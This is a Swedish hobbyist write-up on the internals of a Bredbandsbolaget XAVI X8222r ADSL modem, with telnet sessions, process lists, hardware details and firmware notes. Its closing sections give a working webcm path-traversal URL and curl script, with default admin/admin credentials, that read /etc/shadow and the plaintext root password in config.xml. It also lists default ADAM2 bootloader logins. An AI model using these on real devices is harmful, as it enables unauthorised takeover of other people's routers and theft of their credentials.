Vad som finns innanför BusyBox på BBB XAVI-X8222r
Kan man "root" lösenordet är det bara att ansluta med telnet och kika runt, mer om hur man får tag på det nedan.
telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BusyBox on (none) login: root
Password:
BusyBox v0.61.pre (2005.09.20-06:11+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
bin etc proc usr var.tar
dev lib sbin var
# cd /usr/www/html/
# ls
adv images logout_footer.html setup
applycancel.html index.htm maint status
blank.html index.html menu2.html title.html
blank_left.html js postform.frm tools
conn login.html redirect.html update.html
css logout.frm redirecting.html update_ok.html
errorPage.html logout.html refresh.frm update_ok1.html
help logout.js restart.html upgrading.html
Hur BBBs automatiska uppgradering av modemet fungerar
Genom att köra kommandot ps kan vi lista aktiva program processer som körs i modemet.
# ps
PID Uid VmSize Stat Command
1 root 1284 S init
2 root S [keventd]
3 root S [ksoftirqd_CPU0]
4 root S [kswapd]
5 root S [bdflush]
6 root S [kupdated]
7 root S [mtdblockd]
37 root 1192 S /usr/sbin/thttpd -d /usr/www -u root -p 80 -c /cgi-b
41 root 2768 S /usr/bin/cm_pc
43 root 1284 S init
44 root 3336 S /usr/bin/cm_logic -m /dev/ticfg -c /etc/config.xml
68 root 640 S /sbin/dproxy -c /etc/resolv.conf -d
119 root 664 S /usr/sbin/udhcpc -i nas1 -x -H XAVi_ADSL_Modem -c XA
261 root 628 S /sbin/utelnetd
262 root 1288 S -sh
263 root 1284 R ps
#
BBB kör ett litet programm "cm_logic" som i jämna mellanrum ansluter via internet till bredbandsbolaget och försöker hämta firmwareuppgraderingar samt underhåller konfigurationen på modemet.
... tyvärr verkar det som att BBB inte har tänkt på att modemet inte kan ringa hem ifrån andra nät än BBB's eget vilket resulterar i trassel för personer som har fått BBB's utrustning bakom skanovas nät (läs föredetta bostreamkunder med "b2sk8" abonnemang,"BBB 8/1").
Uppgraderingsfunktionen fungerar inte heller om modemet körs i bryggat läge.
För att den automatiska uppgraderingen av firmware ska fungera krävs det att modemet har loggat in med PPPoE och fått tag i en egen extern IP adress samt dns. Tekniskt sett använder modemet kommandot wget för att hämta hem ny firmware från cpeconfserv.bredband.com inloggningsuppgifter ligger lagrade i binärfilen /usr/bin/cm_logic
Rekomendationer är att köra modemet i bryggat läge och låta en dator som är kopplad till modemet köra PPPoE inloggningen. Då slipper man avbrott i internetförbindelsen när modemet uppgraderar sig själv samt täpper till en stor säkerhetslucka. BBB tillåter nämligen telnet login utifrån i PPPoE läge vilket tekniskt sett möjligör att modemet lätt kan kapas och användas för dolt espionage på den som använder modemet om modemet körs i PPPoE läge med BBB's konfiguration.
http://eforum.idg.se/viewmsg.asp?EntriesId=762056#762200 - Mer utförligt hur man ska ställa om modemet i bryggat läge manuellt.
( för att logga in på modemet ansluter man enklast till http://192.168.1.1 och loggar in med admin admin vilket ska stå i installationsbrevet från bredbandsbolaget. )
Hur man får reda på mer information om hårdvaran
XAVI modemen kör MontaVista linux http://www.mvista.com/ på en 
texas instruments AR7RD
I katalogen /proc kan man läsa ut information hur modemets hårdvara är konfigurerad samt läsa ut lite behändig information som vilken processor vi har att göra med med mera.
# cd /proc/
# cat cpuinfo
processor : 0
cpu model : MIPS 4KEc V4.8
BogoMIPS : 149.91
wait instruction : no
microsecond timers : yes
extra interrupt vector : yes
hardware watchpoint : yes
VCED exceptions : not available
VCEI exceptions : not available
# cat ticfg/env | grep IPA
IPA 192.168.1.55
# cat ticfg/env | grep ProductID
ProductID AR7RD
Uppgifter för att logga in i modemets bootloader. (används för omprogrammering vid uppstart vid service av modemen)
IPA IP nummret (192.168.1.55) är den ipadress som modemets ADAM2 bootloader svarar på mellan 2-4 sek efter att strömmen är påslagen. Om så önskas byta ut hela firmware på modemet görs det lämpligast genom att ansluta med ftp eller telnet när modemets nätverkslampor blinkar till vid strömanslutning och logga in med standard användarnamn adam2 och lösenord adam2.
Hur man använder ADAM2 finns väl dokumenterat på: http://wiki.openwrt.org/OpenWrtDocs/InstallingAR7
Opensource firmware för AR7RD är under utvekling: http://wiki.openwrt.org/AR7Port
Hur man kan få temporärt över egen kod in i modemet när man väl är inloggad
Vill man enbart köra lite egen kod i ADSL modemet utan att byta ut hela firmware går det att tanka över små programm med hjälp av wget och lagra dessa i ramminnet när man är inloggad på adsl modemet. Observera att det mesta av filsystemet inte går att manipulera eftersom det kör squashfs som i sin natur är skrivskyddat, /var däremot lagrar filerna direkt i det lediga utrymmet i modemets ram minne.
En lustig detalj är att AR7 hårdvaran är så pass standardiserad så det går fint att ladda ner kompilerade binärer för en helt annan AR7 baserad router och köra dessa om så önskas. Kika på http://www.beyondlogic.org/nb5/ - för tips hur man kompilerar egen kod för AR7s MIPS arkitektur.
Nedan kollar vi hur filsystemen är monterade och noterar att /var är skrivbar. Vi använder kommandot wget som modemet normalt använder för att hämnta hem ny firmware från bredbandsbolaget för att enkelt ladda ned programfiler från webservrar som modemet kommer åt till /var katalogen. Sedan ändrar vi rättigheter på programfilen och startar programfilen genom att anropa ./ samt programfilens namn.
# mount
/dev/mtdblock/0 on / type squashfs (ro)
none on /dev type devfs (rw)
proc on /proc type proc (rw)
ramfs on /var type ramfs (rw)
# cd /var/
# wget http://www.beyondlogic.org/nb5/hello
hello 100% |*****************************| 9860 00:00 ETA
# chmod +x hello
# ./hello
Hello World!
#
Enkelt sätt att hämta valfri fil från filsystemet utan att behöva logga in som root: använd webcm webinterfacet!
- inklusive filen där root lösenordet ligger lagrat.. ;)
Som avslutning kan vi roa oss med att låta modemets webinterface ladda ned sig själv, eller valfri fil från det interna filsystemet inklusive /etc/passwd och /etc/shadow om så önskas där root lösenordet finns krypterat. Detta är möjligt tack vare att webcm körs som root med mer rättigheter än vad den förtjänar samt att webcm inte bryr sig nämnvärt vad den laddar ned, det kallar vi säkerhet från 80-talet.
http://192.168.1.1/cgi-bin/webcm?getpage=../cgi-bin/webcm
- byt ut den fetmarkelade delen i sökvägen till valfri fil du önskar ladda ned
- Krävs att man först har loggat in i webinterfacet med standardlösenord admin admin från en webbläsare. Om man kör bash kan man i stället göra:
url=http://192.168.1.1/cgi-bin/webcm
curl -Ss \
-d getpage="../html/index.htm" \
-d errorpage=../html/index.html \
-d login:command/username=admin \
-d login:command/password=admin \
-d var:logStatus=go \
$url > /dev/null
Vill man ha tag i root lösenordet utan att behöva forcera krypteringen av /etc/passwd och /etc/shadow så är det bara att hämta hem och kika i /etc/config.xml med hjälp av webinterfacet, där står root lösenordet i klartext mellan passwordx taggarna i xml filen. Verkar som att modemet är konfigurerat att läsa in lösenordet i klartext och sedan skapa /etc/passwd och /etc/shadow från klartext varianten. Lösenordet är visserligen 30 tecken långt men eftersom det passerar unix crypt() funktion reduceras det till en mer behändig variant baserad på de första 8 bokstäverna i lösenordet, så man behöver bara mata in dom första 8 tecknen av lösenordet när man vill logga in som root.
För blandad BBB kuriosa, kika på http://bbbfaq.gunnard.se
Mycket nöje...
Bifogar lite länkar om AR7 hårdvaran som påminnelse hur lik xavi modemets hårdvara är andra fabrikat.
Referenser till aktuell sida
